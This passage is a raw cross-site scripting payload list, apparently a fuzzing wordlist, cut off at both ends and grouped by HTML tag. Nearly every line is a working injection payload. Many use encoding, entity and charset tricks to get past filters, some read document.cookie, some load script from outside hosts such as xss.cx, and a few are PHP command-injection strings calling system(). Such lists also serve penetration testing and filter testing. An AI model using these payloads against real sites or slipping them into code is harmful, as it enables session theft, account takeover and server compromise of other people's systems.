.com>confirm(document.location)</script\nhttp://www.<script abc>setTimeout('confirm(1)',1)</script .com>\nhttp://www.<script>confirm(1)</script .com\n<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->\n<!--[if<img src=x:x onerror=confirm(5)//]-->\n<iframe  src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?\n<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n<iframe %00 src=\"&Tab;javascript:prompt(1)&Tab;\"%00>\n<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() {    return document.cookie }}); confirm(Safe.get());</script>\n<iframe name=alert(1) src=\"//somedomain?x=',__defineSetter__('x',eval),x=name,'\"></iframe>\n<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<iframe onload=alert.call(...[top,location])>\n<iframe onload=`${alert(location)}`>\n<iframe onload=\"(function*(){}).constructor('alert(location)')().next()\">\n<iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>\n<iframe src=/ onload=eval(unescape(this.name.replace(/\\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>\n<iframe src=\"\" onmouseover=\"confirm(document.cookie)\">\n<iframe src=\"#\" style=width:exp/**/ressi/**/on(confirm(1))>\n<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=\"data:D,<script>confirm(top.document.body.innerHTML)</script>\">\n<iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>\n<iframe src=\"data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E\"></iframe>\n<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>\n<iframe srcdoc='&lt;svg/onload=confirm(3)&gt;'>\n<iframe srcdoc=\"<svg/onload=confirm(domain)>\">\n<iframe src=\"http://xss.cx?x=<iframe name=x></iframe>\"></iframe><a href=\"http://xss.ms\" target=x id=x></a><script>window.onload=function(){x.click()}</script>\n<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>\n<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>\n<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n<iframe src=javascript&colon;confirm&lpar;document&period;location&rpar;>\n<iframe src=\"javascript:'<script src=http://xss.cx ></script>'\"></iframe>\n<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>\n<iframe src=\"\"//srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>\n<iframe src=\"view-source:http://www.example.org/\" frameborder=\"0\" style=\"width:400px;height:180px\"></iframe><textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>\n\"><iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n<iframe width=0 height=0 src=\"javascript:confirm(1)\">\n<iframe/%00/ src=javaSCRIPT&colon;confirm(1)\n<iframe%20onload=\"new%20Promise($=>alert(location))\">\n\"><iframe%20src=\"http://google.com\"%%203E\n<iframe/*%%%%25%%%25*/src='javascript:vbscript:%0b%0a/**/;//:http://www.google.com/?=%0a/**/javascript:%0a/*oleeeeeeeeeeeeeee*/alert(2);'>\niframe.contentWindow.location.constructor.prototype\n<iframe><iframe src=javascript:confirm(4)></iframe>\n<iframe/name=\"if(0){\\u0061lert(1)}else{\\u0061lert(1)}\"/onload=\"eval(name)\";>\n<iframe/name=\"if(0){\\u0061lert(1)}else{\\u0061lert(1)}\"/onload=\"eval(name)\";> \n<iframe/name=\"javascript:confirm(1);\"onload=\"while(1){eval(name);}\">\n\"><iframe/onreadystatechange=confirm(1)\n<iframe/onreadystatechange=confirm(1)\n<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n\"><iframe/src \\/\\/onload = prompt(1)\n<iframe/src \\/\\/onload = prompt(1)\n<iframe/src=\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">\n<iframe/src=\"data:text/html,<svg &#111;&#110;load=confirm(1)>\">\n/*iframe/src*/<iframe/src=\"<iframe/src=@\"/onload=prompt(1) /*iframe/src*/>\n<iframe/src=j&Tab;av&Tab;as&Tab;cri&Tab;pt&Tab;:co&Tab;nfir&Tab;m&Tab;(&Tab;&Tab;1&Tab;)>\n<iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'>\n<iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'>\n<!--[if]><script>alert(1)</script --><!--[if<img src=x onerror=alert(2)//]> -->\n<!--[if]><script>confirm(1)</script -->\n<image src=`` onerror=setTimeout/*(\"__\")*/`\\u0061lert\\u00281\\u0029/**/`>\n<img class=\"emoji\" alt=\"😯\" src=\"x\" /><svg onload=prompt(document.domain)>\n<img language=vbs src=<b onerror=alert#1/1#>\n<img language=vbs src=<b onerror=confirm#1/1#>  \n<img =\"><script>alert(1)</script>\">\n\"><img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n<img src ?itworksonchrome?\\/onerror = confirm(1)\n<img src ?itworksonchrome?\\/onerror = confirm(1)???\n<img src onerror /\" '\"= alt=alert(1)//\">\n“><img src= onerror=confirm(1)>\n<img src=//\\ onload=confirm(1)>\n<img src=`%00`&NewLine; onerror=confirm(1)&NewLine;\n<img src=1 onerror=Function(\"aler\"+\"t(documen\"+\"t.domain)\")()>\n\"]<img src=1 onerror=alert(1)>\n\"]<img src=1 onerror=confirm(1)>\n/#<img src=1 onerror=javascript:confirm(3)>\n<img src=\"\"><SCRIPT/ASYNC/SRC=\"/〳⒛₨\">\n<img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>\n<img src=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\">\n<img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> #\n<!--<img src=\"--><img src=x onerror=alert(1)//\">\n\"><img src=javascript:while([{}]);>\n<img src=javascript:while([{}]);>\n<img/ src//'onerror/''/=confirm(1)//'>\n<img src=test.jpg?value=\">Yes, we are still inside a tag!\">\n<img src=x on*chr*Error=\"javascript:log(*num*)\"/>\n<img src=x onerror=URL='javascript:confirm(1)'>\n\"\\\"><img src=\\\"x\\\" onerror=\\\"confirm(0)\\\"/>\",\n><img src=\\\"x\\\" onerror=\\\"confirm(0)\\\"/>\n\"><img src=x onerror=confirm(1); ...\n<img src=x onerror='confirm(domain+/ -- /+cookie)'>\">\n<img src=x onerror='confirm(domain+/ -- /+cookie)'>\">\n\"><img src=x onerror=confirm('x') />]\n<img src=x onerror=\"document.location='http:&#x2F;&#x2F;xss.cx'\";>\n'\"><img src=x onerror=prompt(0);\"onfocus=prompt(3); \"\n\"><img src=x onerror=prompt(1);>\n\"><img src=x onerror=prompt(document.location);>#\"><img src=x onerror=prompt(document.location);>\n\"><img src=x onerror=prompt(\"xss\");>#\"><img src=x onerror=prompt(\"xss\");>\n\"><img src=x onerror=window.open('https://www.google.com/');>\n\"<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>\"\n\"\\\"><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>\",\n<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>\n><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>\n\"<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>\"\n<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>\n\"/><img src=x onerror=x.onerror=prompt(0)>\n\"\\\"/><img src=x onerror=x.onerror=prompt(0)>\"\n\"/><img src=x onerror=x.onerror=prompt&lpar;/xss/.source&rpar;;confirm(0);confirm(1)>\n\"\\\"/><img src=x onerror=x.onerror=prompt&lpar;/xss/.source&rpar;;confirm(0);confirm(1)>\"\n<img src=\"x` `<script>alert(1)</script>\"` `>\n@\"><img src=x/onerror=confirm(1)>xss\n<img src=x:prompt(alt) onerror=eval(src) alt=(1)>\n<![<img src=x:x onerror=`confirm(2)//`]-->\n<img src=xx: onerror=confirm(document.location)>\n\"><img src=\"xx:x\" alt=\"``onerror=confirm(1)\"><script>document.body.innerHTML+=''</script>\n<img src=\"xx:x\" alt=\"``onerror=confirm(1)\"><script>document.body.innerHTML+=''</script>\n\"<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>\"\n\"\\\"><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>\",\n<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>\n><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>\n<img src=xx:xx onerror=window[['logChr*chr*']](*num*)>\n<img src=`xx:xx`onerror=confirm(1)>\n<img src=`xx:xx`onerror=confirm(1)>\n<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\n>\"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>\n<img[a][b]src=x[d]onerror[c]=[e]\"alert(1)\">\n\"<img/src=` onerror=confirm(1)>\"\n<img/src=` onerror=confirm(1)>\n\"><--`<img/src=` onerror=confirm(1)> --!>\n<--`<img/src=` onerror=confirm(1)> --!>\n<img/src=%00 id=confirm(1) onerror=eval(id)\n<img/src=`%00` /id=confirm(1) /onerror=eval(id)\n<img/src=`%00` onerror=this.onerror=confirm(1) \n<img/src=@&#32;&#13; onerror = prompt('&#49;')\n<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)\n<img/src=x alt=confirm(1) onmouseover=eval(alt)>\n<img/src=x alt=confirm(1) onmouseover=eval(alt)>\n\"\\\"><imgsrc=x onerror=confirm.onerror=confirm(1)>\",\n><imgsrc=x onerror=confirm.onerror=confirm(1)>\n<img/src=\"x\"/id=\"javascript\"/name=\":confirm\"/alt=\"(1)\"/onerror=\"eval(id + name + alt)\">\n=’”><img/src=”x”onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>\n<img/src=x:\\u0070r\\u006fmp\\u0074(alt) onerror=x:e\\u0076al(src) alt=&#088;&#083;&#083;>\n'><img/src=\"x:x\"/onerror=\"confirm(1)\"'><\ninnerHTML=document.title\ninnerHTML=innerText\n<input autofocus onfocus=confirm(1)>\n<input formaction=JaVaScript:confirm(document.cookie)>\n<input id=x><input id=x><script>confirm(x)</script>\n<input onblur=focus() autofocus><input>\n<input onblur=write(1) autofocus><input autofocus>\n<><input onfocus=confirm(0) autofocus <!--\n<input onfocus=write(1) autofocus>\n<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!>\n<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>\n<input type=hidden onformchange=confirm(1)/>\n<input type=hidden style=`x:expression(confirm(1))`>\n<input type=hidden style=`x:expression(confirm(4))`>\n<input type=\"search\" onsearch=\"aler\\u0074(1)\">\n<input type=\"text\" name=\"a\"\n<input type=\"text\" value=`` <div/onmouseover='confirm(1)'>X</div>\n<input type=\"text\" value=``<div/onmouseover='confirm(1)'>X</div>\n\"><input value=<><iframe/src=javascript:confirm(1)\n<input value=<><iframe/src=javascript:confirm(1)\ninput1=<script/&in%u2119ut1=>al%u0117rt('1')</script>\n<input+name=xss+value=\"%26lt;script>alert%26lpar;1)%26lt;/script>\">\n<input/onmouseover=\"javaSCRIPT&colon;confirm&lpar;1&rpar;\"\n<input/type=\"image\"/value=\"\"`<span/onmouseover='confirm(1)'>X`</span>\n<i/onclick=URL=name>\n<isindex action=\"javas&Tab;cript:alert(1)\" type=image>\n\"/><isindex action=\"javas&Tab;cript:confirm(1)\" type=image>\n\"><isindex action=\"javas&Tab;cript:confirm(1)\" type=image>\n<isindex action=\"javas&Tab;cript:confirm(1)\" type=image> \n<isindex action=\"javas&Tab;cript:confirm(document.cookie)\" type=image>\n<isindex formaction=javascript:confirm(1)>\n<i/style=x=x/**/(confirm(1))('\\')expression\\')>\n<i/style=x=x/**/n(confirm(1))('\\')expressio\\')>\njaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert(3))//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(4)//>\\x3e\njavascript:_e({}, 'cvml', 'test-01-'-alert(1)-'');\n<javascript:prompt(document.cookie)>  \njavascript:/*--></title></style></textarea></script></xmp><svg/onload='+//+/onmouseover=1/+/[*/[]/+alert(1)//'>\n<label class=\"<% confirm(1) %>\">\n<li style=\"color:rgb(''0,0,&#0;javascript:expression(confirm(1))\">XSS</li>\n<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>\n<link rel=\"import\" href=\"//xss.cx\">\n<link rel=import onerror=confirm(1)>\n<link rel=\"prefetch\" href=\"http://xss.cx\">\n<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d\n<link rel=stylesheet href='data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D' >\n<link%20rel=\"import\"%20href=\"?bypass=<script>confirm(document.domain)</script>\">\n<listing>&ltimg src=x onerror=confirm(1)&gt</listing>\n&lt\n&lt;\n&lt;a href=\"http://i.imgur.com/b7sajuK.jpg\" download&gt;<a href=\"http://i.imgur.com/b7sajuK.jpg\" download>What a cute kitty!</a>&lt;/a&gt;\n&lt;img src=xx:x onerror=confirm(1)&gt;<script>document.body.innerHTML=document.body.innerText||document.body.textContent</script>\n&lt;label class=\"&lt;% confirm(1) %&gt;\"&gt;\n&lt;/script&gt;&lt;script&gt;confirm(1)&lt;/script&gt;\n<mArquee%20onStart%3D[~[onmouseleave(([[(alert(1))]]))]]%20]\n<marquee loop=1 width=0 onfinish=alert(1)>\n<marquee onstart='javascript:confirm&#x28;1&#x29;'>^__^\n\"><marquee>confirm( `bypass :)`)</marquee>\n'\">><marquee><img src=x onerror=confirm(1)></marquee>\n\"<marquee/onstart=confirm(/XSS/.source);confirm(1)>\"\n\"\\\"><marquee/onstart=confirm(/XSS/.source);confirm(1)>\",\n<marquee/onstart=confirm(/XSS/.source);confirm(1)>\n><marquee/onstart=confirm(/XSS/.source);confirm(1)>\n<math href=\"javascript:alert(1)\">CLICKME</math><math><!-- up to FF 13 --><maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction><!-- FF 14+ --><maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction></math>\n<math><XSS href=\"javascript:alert(location)\">xss\n<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n<math><a/xlink:href=javascript&colon;confirm&lpar;1&rpar;>click\n<math><a/xlink:href=javascript:eval('\\141\\154\\145\\162\\164\\50\\61\\51')>X\n<math><mrow href=javascript:alert(1)>XSS</mrow></math>\n<meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J\n<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi\n<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>\n<meta charset=\"x-mac-farsi\">Â¼script Â¾alert(1)//Â¼/script Â¾\n<meta charset=\"x-mac-farsi\">Â¼script Â¾confirm(1)//Â¼/script Â¾\n<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; confirm(1)\" http-equiv=\"refresh\"/>\n<meta http-equiv=refresh content=\"0 javascript:confirm(1)\">\n\"><meta http-equiv=\"refresh\" content=\"0;javascript&colon;confirm(1)\"/>\n<meta http-equiv=\"refresh\" content=\"0;javascript&colon;confirm(1)\"/>\n<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">\n<meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)>\n?movieName=\";]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);//\n\"name\":\"Foo <img src=x onerror=alert(/XSS/.source)>Bar\"\n＜℅ncut=ﬁnd()＞x\n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)\n<object allowscriptaccess=\"always\" data=\"test.swf\"></object>\n<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?\n\"\\\"\\/><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>\"\n><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>\"\n<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>\n<object data='data:text/xml,<script xmlns=\"http://www.w3.org/1999/xhtml \">confirm(1)</script>>'>\n\"><object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">?\n\"/><object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object><object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>\n<object onbeforescriptexecute=\"alert(1)\"/><script>+</script>\n\"/><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>\n\"<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>\"\n\"><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>\",\n<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>\n\"/><object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/\"///><img id=\"b1\" src=1 onerror='$.getScript(\"http://xss.cx/xss.js\", function() { c(); });'>'\n'/onmouseover='alert(1);'/a=\n\"onresize=prompt(1)>\n\"<option>'><button><img src=x onerror=confirm(0);></button></option>\"\n<option>'><button><img src=x onerror=confirm(0);></button></option>\n\"\\\"\\/><option>'><button><img src=x onerror=confirm(1);></button></option>\",\n><option>'><button><img src=x onerror=confirm(1);></button></option>\n<p class=\"comment\" title=\"\"onload='/*\"></p>\n<p class=\"comment\" title=\"*/prompt(1)'\"></p>\n<p class=\"comment\" title=\"\"><svg/a=\"></p>\n<p hidden?={{hidden}}>123</p> \n<p onbeforescriptexecute=\"alert(1)\"><svg><script>\\</p>\n<p style=\"font-family:'foo&amp;#x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(confirm(1))'\">\n?param1=<script>prompt(9);/*&param2=*/</script>\n$.parseHTML('<img src=xx:X onerror=confirm(1)>')\n<?php echo $_SERVER['PHP_SELF']?>\n</plaintext\\></|\\><plaintext/onmouseover=prompt(1)\n?playerID=a\\\";))}catch(e){confirm(document.domain)}//\n<pre style=line-height:1><script>d=document;for(i=1;i<4001;i++){d.write(Math.random()<.5?\"\\u2571\":\"\\u2572\");d.write(i%80?\"\":\"\\n\")}</script>\n${@print(system($_SERVER['HTTP_USER_AGENT']))}\n${@print(system(“whoami”))}\n<q/oncut=confirm()\n'/><q/oncut=open()>//\n<q/oncut=open()>\n>&quot;&gt;&lt;script&gt;confirm(&#039;hi&#039;)&lt;/script&gt;&quot;&lt;</a>value=\"\"><script>confirm('hi')</script>\"<\"/>\n.replace(/.+/,eval)//\n<s \"'\"=\"\" 000=\"\">\n\"'\"><s/000 \"'\"><s/000\n\"'\"><s/000 \"'\"><s/000 \n<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>\n<s[NULL]cript>confirm(1)</s[NULL]cript>'>Clickme</a>\n<sVg><scRipt 